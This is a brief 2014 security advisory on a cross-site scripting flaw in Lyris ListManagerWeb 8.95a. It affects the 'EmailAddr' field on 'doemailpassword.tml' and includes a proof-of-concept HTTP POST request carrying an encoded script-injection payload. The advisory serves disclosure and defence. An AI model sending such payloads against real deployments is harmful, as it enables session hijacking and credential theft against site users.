Home / os / blackberry

Lyris ListManagerWeb 8.95a Cross Site Scripting

Posted on 30 July 2014

Author: 1N3 Website: http://xerosecurity.com Vender Website: http://lyris.com/us-en/products/listmanager Affected Product: Lyris ListManagerWeb Affected Version: 8.95a ABOUT: Lyris ListManager (Lyris LM) is an on-premises email marketing software for companies that require the ability to deploy high-volume email programs behind a firewall. Version 8.95a suffers from a cross site scripting (XSS) vulnerability in the “doemailpassword.tml” page because it fails to properly sanitize the “EmailAddr” POST variable. POC: POST http://host.com/doemailpassword.tml HTTP/1.1 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:24.0) Gecko/20140610 Firefox/24.0 Iceweasel/24.6.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Referer: http://host.com/emailpassword.tml Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 71 Proxy-Connection: Keep-Alive Host: host.com EmailAddr=%3C%2Ftd%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E%3Ctd%3E

 

TOP